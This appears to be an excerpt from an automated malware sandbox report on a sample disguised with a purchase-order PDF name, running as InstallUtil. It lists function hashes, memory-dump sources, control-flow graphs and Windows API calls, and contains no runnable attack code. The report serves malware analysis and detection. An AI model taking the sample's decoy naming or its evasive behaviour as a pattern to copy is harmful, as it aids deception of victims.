                                                          • Opcode Fuzzy Hash: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction Fuzzy Hash: 3AE0C9B4D04208EFCB54DFA9D441A9CBBF4FB49300F20C1AAD81893350D6769A52DF41
                                                          Function 07525848 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction ID: cb54a08a030c259dc60f3cd4b685c5f78551c498d021cfb3e2a962e22f159388
                                                          • Opcode Fuzzy Hash: 3ce9b4f55d3d0cdc3e699c37e3331f711e57c7d453646c344ea42b03361b3790
                                                          • Instruction Fuzzy Hash: 20E0C9B4D04208EFDB54DFA9D440A9CBBF4FB49300F24C1AA981893340DA769A56DF80
                                                          Function 0751308D Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e540585a7dc5185c92e520d2940507af7580c72246277e20ad8da747179f9433
                                                          • Instruction ID: b3b317fbcb27ce313f8a7b97523a47ea539548d31384514c92566f7f135b23a7
                                                          • Opcode Fuzzy Hash: e540585a7dc5185c92e520d2940507af7580c72246277e20ad8da747179f9433
                                                          • Instruction Fuzzy Hash: 44F054B4A04229CFC714DF58C888A89B3B5FB4A200F1082D5D55D97784CB386E858F50
                                                          Function 0752ED30 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58f0fe5318832138d4067011313e14227ddd28bf4a56cecd8e5a5afccbfa1f64
                                                          • Instruction ID: a309396c939bb4eb46596fc2d8dabf2b4685cf750d236ea296d44ba04e91c2d4
                                                          • Opcode Fuzzy Hash: 58f0fe5318832138d4067011313e14227ddd28bf4a56cecd8e5a5afccbfa1f64
                                                          • Instruction Fuzzy Hash: 5CE026B0E08218DBCB50EFF8D44979CBBF4FB06200F1080AAC84C93380DA711E41DB81
                                                          Function 010BEDA0 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b64f30d87adefb8a149f6087f89eff66246add9614fca4254c4c205fc1240be
                                                          • Instruction ID: 0f5389c67b1f5d36af70bd766a5afff375b5247e9c025b5f50017b9eeb784ce6
                                                          • Opcode Fuzzy Hash: 0b64f30d87adefb8a149f6087f89eff66246add9614fca4254c4c205fc1240be
                                                          • Instruction Fuzzy Hash: 8FE08675908218EBD704DFA8D440AEDBFB9AB45300F10C1D9D98457381D6729E41DB94
                                                          Function 07528650 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbd080fcfd9983bb758317d67651882190e1f13a47fc101f424f818cfde74aa
                                                          • Instruction ID: 643bd6900a2c552ca076a1c01c04bd72be9ce3d5f5cd0d6afca13df4728e3cc7
                                                          • Opcode Fuzzy Hash: 5cbd080fcfd9983bb758317d67651882190e1f13a47fc101f424f818cfde74aa
                                                          • Instruction Fuzzy Hash: 99E01A74D04298EFC714DF95D440AACBBB4AB49200F10C1EAC85853381C676AA42DF44
                                                          Function 0752BD08 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbd080fcfd9983bb758317d67651882190e1f13a47fc101f424f818cfde74aa
                                                          • Instruction ID: 30a41693cba74ab8b6eba787a20619373d420b9763a37ae0ff8507609470ce97
                                                          • Opcode Fuzzy Hash: 5cbd080fcfd9983bb758317d67651882190e1f13a47fc101f424f818cfde74aa
                                                          • Instruction Fuzzy Hash: C9E01AB4D04258ABCB54DF95D4407ECBBB4AB49204F10C1EAD85853382DA769A42DF40
                                                          Function 0752AFB8 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d078458866bc3960208fa99988e63c07e370f76bd7686754f4b3fb540a73a429
                                                          • Instruction ID: 046a062d8437e2f19fa84b6842dd656d4c33734d85fdff73d86dfe7ecca7bafb
                                                          • Opcode Fuzzy Hash: d078458866bc3960208fa99988e63c07e370f76bd7686754f4b3fb540a73a429
                                                          • Instruction Fuzzy Hash: 54E012B2501258DBD750FFF584006DEB7F9DF45200F1085A6850993650EEB64E14EB95
                                                          Function 0752E048 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b05a9710abfe93d0840c8a1bfbb446225393184728620158aaaf87bc08587926
                                                          • Instruction ID: 091d5ffa573be8c162add452138342f551e1e37911858ac1f3336e9c4c529f16
                                                          • Opcode Fuzzy Hash: b05a9710abfe93d0840c8a1bfbb446225393184728620158aaaf87bc08587926
                                                          • Instruction Fuzzy Hash: 2BE01274908218DBD714DF95D545AADBBB8FB47304F20C5DDC80827381CA729E43DB95
                                                          Function 010BD890 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99b828a84a104219c434a9a650ec971fdb0c9e380f616fc6a2674bc1764204c3
                                                          • Instruction ID: 290e0fe2919ae38387e6b37f80e793272ff55d44b76895d611d25d483e6f50ad
                                                          • Opcode Fuzzy Hash: 99b828a84a104219c434a9a650ec971fdb0c9e380f616fc6a2674bc1764204c3
                                                          • Instruction Fuzzy Hash: EEE08C31800308EBD740EFE48804A8E7BF8DB05201F1140A6C20993600EEB24E00AB91
                                                          Function 0752E470 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3206638c716d73bbef905f3a7b2b0cc0995f5e7b7efa4404b7ad0dae4835f8c
                                                          • Instruction ID: 273e47ef9f735436f4d1395d97bd9feb4cdbfb6b690dc65438eebc98eb3b8e35
                                                          • Opcode Fuzzy Hash: a3206638c716d73bbef905f3a7b2b0cc0995f5e7b7efa4404b7ad0dae4835f8c
                                                          • Instruction Fuzzy Hash: 64C02BB144932983E32056E1A80D3F033DCE707211F401802820D018920AE548A0DBD5
                                                          Function 010B0839 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc785fd63c6fabcb28a71ff4d18c568fff590bacafa6f88110287641c4dae874
                                                          • Instruction ID: 873ab6faba4f87551bb19213d0998722cd34df93b1967539b67c40d34a58159c
                                                          • Opcode Fuzzy Hash: fc785fd63c6fabcb28a71ff4d18c568fff590bacafa6f88110287641c4dae874
                                                          • Instruction Fuzzy Hash: 76D01261A0D2C00FCF27177019780E83FB29E571083BD09CEC0C28E1A3E90A0807C319
                                                          Function 010BD678 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0a3076578eba476bd7423f1afde33d06d7a1d0d14c4d3cd42ced72e39775651
                                                          • Instruction ID: af588b336702cf667d3e0616833db985b47b6256a6913f50e33584f0690b58e4
                                                          • Opcode Fuzzy Hash: b0a3076578eba476bd7423f1afde33d06d7a1d0d14c4d3cd42ced72e39775651
                                                          • Instruction Fuzzy Hash: D2C08C3A100288CBF3A83BE5E80D72877F86B04607F010052DB4C008108EFA4854DF6A

                                                          Non-executed Functions

                                                          Function 029D6D00 Relevance: .2, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8733c8978e6a5a8841184fbea860effc30fa851893e95c01a171207f51d9fa41
                                                          • Instruction ID: 287126d11933fb5f8cd70cace219add210a44c409cb2dcd6d5696d04dc1ce3bc
                                                          • Opcode Fuzzy Hash: 8733c8978e6a5a8841184fbea860effc30fa851893e95c01a171207f51d9fa41
                                                          • Instruction Fuzzy Hash: 29910974A04208CFDB44DFA9E584BEEBBF6FB8A304F109029E405AB799CB745849DF50
                                                          Function 07510040 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 10ce762ac6e5fba768b0992d6c4137a632704f6fdf2fc008d9207d5ace70c43f
                                                          • Instruction ID: 285ae7d5d4781c2e9c027b68540e2cbadef5581add62a008a401e0225b654eb1
                                                          • Opcode Fuzzy Hash: 10ce762ac6e5fba768b0992d6c4137a632704f6fdf2fc008d9207d5ace70c43f
                                                          • Instruction Fuzzy Hash: 7F5118B4E052298FEB28DF2AC8486D9B7F6BB89301F00C1E9D51DA7655DB345E85CF00
                                                          Function 07510006 Relevance: .1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6cd53538c031d53d283902fe3823b09587bb900360cdd81f755bc1569031d42d
                                                          • Instruction ID: 443cb002f4d5df25c475aa54ca260fde4a7942ed64faf22a1b887e60557f58cd
                                                          • Opcode Fuzzy Hash: 6cd53538c031d53d283902fe3823b09587bb900360cdd81f755bc1569031d42d
                                                          • Instruction Fuzzy Hash: 4C4171B1D097948FE72ACF2A9C442D9BFB6BF86200F05C1EAD4489A152DB350A85DF51
                                                          Function 010BA1C8 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1295a26a2705b655887ef97f5edce9d4ed324bd8a8c064961464ec5185df9542
                                                          • Instruction ID: 4b48a84b31da986222d70aa1b08aeaf34d660c049664e077c84dacf68ce19899
                                                          • Opcode Fuzzy Hash: 1295a26a2705b655887ef97f5edce9d4ed324bd8a8c064961464ec5185df9542
                                                          • Instruction Fuzzy Hash: A33177B1E01618DBEB68CF6BC94879EFAF6AF89304F14C1A9C44C67254DB750A858F01
                                                          Function 029D2580 Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 974df857cf46be29fa475622a656bd61e16a510d00caf3b86c64d14b13926d77
                                                          • Instruction ID: 2f2b060ff39eeafffc646e8df0c0c83b6994a68c1ea161fc27b813fe4f9a2f9e
                                                          • Opcode Fuzzy Hash: 974df857cf46be29fa475622a656bd61e16a510d00caf3b86c64d14b13926d77
                                                          • Instruction Fuzzy Hash: 1A313AB0D05618CBEB18CF6AD94479EFBF6AF88300F10C46AD819B3259DB740989DF50
                                                          Function 010BA1B8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eabde90bb3714a88165596d3300c7d621b92a1623961bce93d8f89217cbdb8a
                                                          • Instruction ID: 57d4aa06ab786ef9d25abc48e521771a4a83f56048e985a939718a90a9712806
                                                          • Opcode Fuzzy Hash: 4eabde90bb3714a88165596d3300c7d621b92a1623961bce93d8f89217cbdb8a
                                                          • Instruction Fuzzy Hash: 753198B1E016189BEB28CF6BC84578EFAF7AFC8304F14C1A9C45CA7265EB7509858F40

                                                          Execution Graph

                                                          Execution Coverage:7.5%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:55
                                                          Total number of Limit Nodes:8
                                                          execution_graph 13689 2896788 DuplicateHandle 13690 289681e 13689->13690 13691 2894668 13692 2894676 13691->13692 13695 2896de1 13692->13695 13693 28946e9 13696 2896e05 13695->13696 13700 2896ee0 13696->13700 13704 2896ef0 13696->13704 13697 2896e0f 13697->13693 13701 2896f17 13700->13701 13703 2896ff4 13701->13703 13708 28963d4 13701->13708 13705 2896f17 13704->13705 13706 28963d4 CreateActCtxA 13705->13706 13707 2896ff4 13705->13707 13706->13707 13709 2897370 CreateActCtxA 13708->13709 13711 2897433 13709->13711 13712 289bf10 13713 289bf1f 13712->13713 13715 289bff7 13712->13715 13716 289c03c 13715->13716 13717 289c019 13715->13717 13716->13713 13717->13716 13718 289c240 GetModuleHandleW 13717->13718 13719 289c26d 13718->13719 13719->13713 13720 289e120 13721 289e12d 13720->13721 13722 289e166 13721->13722 13724 289c784 13721->13724 13725 289c78f 13724->13725 13727 289e1d8 13725->13727 13728 289c7b8 13725->13728 13729 289c7c3 13728->13729 13732 289e2c0 13729->13732 13730 289e256 13730->13727 13733 289e2ee 13732->13733 13735 289e317 13733->13735 13737 289e3bf 13733->13737 13738 289c850 13733->13738 13736 289e3ba KiUserCallbackDispatcher 13735->13736 13735->13737 13736->13737 13739 289c85b 13738->13739 13742 289c8c4 13739->13742 13741 289e8d5 13741->13735 13743 289c8cf 13742->13743 13744 289e990 GetFocus 13743->13744 13745 289e989 13743->13745 13744->13745 13745->13741 13746 2896540 13747 2896586 GetCurrentProcess 13746->13747 13749 28965d8 GetCurrentThread 13747->13749 13750 28965d1 13747->13750 13751 289660e 13749->13751 13752 2896615 GetCurrentProcess 13749->13752 13750->13749 13751->13752 13755 289664b 13752->13755 13753 2896673 GetCurrentThreadId 13754 28966a4 13753->13754 13755->13753

                                                          Executed Functions

                                                          Function 02896530 Relevance: 6.1, APIs: 4, Instructions: 143threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 028965BE
                                                          • GetCurrentThread.KERNEL32 ref: 028965FB
                                                          • GetCurrentProcess.KERNEL32 ref: 02896638
                                                          • GetCurrentThreadId.KERNEL32 ref: 02896691
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: f633b1e61e99bbe016dc6ee4bf8b3fd530d09248e89f32ec55b7c1a004fdfeda
                                                          • Instruction ID: f85e9e1dfa287333e2d7e623ed7b1fbdeeaf43e52f8c5a8e2c291941ea1a2ed1
                                                          • Opcode Fuzzy Hash: f633b1e61e99bbe016dc6ee4bf8b3fd530d09248e89f32ec55b7c1a004fdfeda
                                                          • Instruction Fuzzy Hash: 9251BCB4D0034ACFDB05CFA9D948B9EBFF4EF88318F24805AD508A7291DB789945CB65
                                                          Function 02896540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 028965BE
                                                          • GetCurrentThread.KERNEL32 ref: 028965FB
                                                          • GetCurrentProcess.KERNEL32 ref: 02896638
                                                          • GetCurrentThreadId.KERNEL32 ref: 02896691
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: a139d362956d11a0de2028fbefc843394b8bc4018405d87e15197e1fe706a94c
                                                          • Instruction ID: 82a1c6573a239d2379d8788a37fbd28bdf99043537b42ef40feea1c9e1f955f5
                                                          • Opcode Fuzzy Hash: a139d362956d11a0de2028fbefc843394b8bc4018405d87e15197e1fe706a94c
                                                          • Instruction Fuzzy Hash: 2F5167B4D00209CFEB04CFA9D548B9EBBF5EF88318F248459E509A7350DB78A945CB65
                                                          Function 0289BFF7 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 52 289bff7-289c017 53 289c019-289c026 call 289b35c 52->53 54 289c043-289c047 52->54 61 289c028 53->61 62 289c03c 53->62 56 289c049-289c053 54->56 57 289c05b-289c09c 54->57 56->57 63 289c0a9-289c0b7 57->63 64 289c09e-289c0a6 57->64 107 289c02e call 289c290 61->107 108 289c02e call 289c2a0 61->108 62->54 65 289c0b9-289c0be 63->65 66 289c0db-289c0dd 63->66 64->63 68 289c0c9 65->68 69 289c0c0-289c0c7 call 289b368 65->69 71 289c0e0-289c0e7 66->71 67 289c034-289c036 67->62 70 289c178-289c238 67->70 73 289c0cb-289c0d9 68->73 69->73 102 289c23a-289c23d 70->102 103 289c240-289c26b GetModuleHandleW 70->103 74 289c0e9-289c0f1 71->74 75 289c0f4-289c0fb 71->75 73->71 74->75 76 289c108-289c111 call 289b378 75->76 77 289c0fd-289c105 75->77 83 289c11e-289c123 76->83 84 289c113-289c11b 76->84 77->76 85 289c141-289c14e 83->85 86 289c125-289c12c 83->86 84->83 92 289c171-289c177 85->92 93 289c150-289c16e 85->93 86->85 88 289c12e-289c13e call 289b388 call 289b398 86->88 88->85 93->92 102->103 104 289c26d-289c273 103->104 105 289c274-289c288 103->105 104->105 107->67 108->67
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0289C25E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 496b21b38a47b3a45ef189299e37085e9dfc671c5b2935f9f41212b898e3f4a0
                                                          • Instruction ID: f6884f04d1fbfba5a538c624d2cff28063aa4d7c51a2f1874cd621e3d8404edc
                                                          • Opcode Fuzzy Hash: 496b21b38a47b3a45ef189299e37085e9dfc671c5b2935f9f41212b898e3f4a0
                                                          • Instruction Fuzzy Hash: 89813678A00B058FDB24DF69D44075ABBF1FF88304F048A2ED48AD7A50DB75E946CB91
                                                          Function 02897365 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 109 2897365-289736d 110 2897370-2897431 CreateActCtxA 109->110 112 289743a-2897494 110->112 113 2897433-2897439 110->113 120 28974a3-28974a7 112->120 121 2897496-2897499 112->121 113->112 122 28974a9-28974b5 120->122 123 28974b8 120->123 121->120 122->123 125 28974b9 123->125 125->125
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 02897421
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 80e29ed6004937457026bbf9e38f189523283b94d129e6f7d5eb354b1e3d714c
                                                          • Instruction ID: 90342fb6845b9f83983282b7cd2b44d9478296cec8c5f70aeaf1533178bba9a4
                                                          • Opcode Fuzzy Hash: 80e29ed6004937457026bbf9e38f189523283b94d129e6f7d5eb354b1e3d714c
                                                          • Instruction Fuzzy Hash: 2041E0B4C00619CBEF25CFA9C9447CDBBB6BF89708F24806AD408AB251DB756946CF90
                                                          Function 028963D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 126 28963d4-2897431 CreateActCtxA 129 289743a-2897494 126->129 130 2897433-2897439 126->130 137 28974a3-28974a7 129->137 138 2897496-2897499 129->138 130->129 139 28974a9-28974b5 137->139 140 28974b8 137->140 138->137 139->140 142 28974b9 140->142 142->142
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 02897421
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 6aa5b8ff544ffd31f719617bb7312b9fd3bfd7e64160d1eaf09122b9f6342c00
                                                          • Instruction ID: e9101ca28d160bc3bb5f63ca6b3bcdfa017759be2d1035492e601d0a3b7a9ff9
                                                          • Opcode Fuzzy Hash: 6aa5b8ff544ffd31f719617bb7312b9fd3bfd7e64160d1eaf09122b9f6342c00
                                                          • Instruction Fuzzy Hash: 8441CFB4C0061DCBEB24CFA9C944B9EBBB5BF89708F24805AD408AB251DB756946CF90
                                                          Function 02896788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 143 2896788-289681c DuplicateHandle 144 289681e-2896824 143->144 145 2896825-2896842 143->145 144->145
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289680F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 60acf8213cfeb7a4f82c2fe15aabef378bc9626768070f6e5fe0682723c7def5
                                                          • Instruction ID: 08b2cfda84dd3f30ccb08878e589a3a475b339f40693c388677a99c4881a73ef
                                                          • Opcode Fuzzy Hash: 60acf8213cfeb7a4f82c2fe15aabef378bc9626768070f6e5fe0682723c7def5
                                                          • Instruction Fuzzy Hash: 6921E3B59002099FDB10CF9AD984ADEBBF8FB48320F14801AE918A3210D378A954CFA5
                                                          Function 02896782 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 148 2896782-289681c DuplicateHandle 149 289681e-2896824 148->149 150 2896825-2896842 148->150 149->150
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289680F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4591607842.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2890000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 01b8691e9c62a7bd675be6678c4e74afe66114433dd7f8396880b3820a5426b3
                                                          • Instruction ID: 84ff15fa37d0108a7b4fc4bee98089850e43963d297d9c53684e21fbc32deefb
                                                          • Opcode Fuzzy Hash: 01b8691e9c62a7bd675be6678c4e74afe66114433dd7f8396880b3820a5426b3
                                                          • Instruction Fuzzy Hash: 2621FFB9900249DFDB00CFA9D580BDEBBF5FB48320F14846AE958A3250D378A950CF64
                                                          Function 0289C1F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 153 289c1f8-289c238 154 289c23a-289c23d 153->154 155 289c240-289c26b GetModuleHandleW 153->155 154->155 156 289c26d-289c273 155->156 157 289c274-289c288 155->157 156->157
                                                          APIs
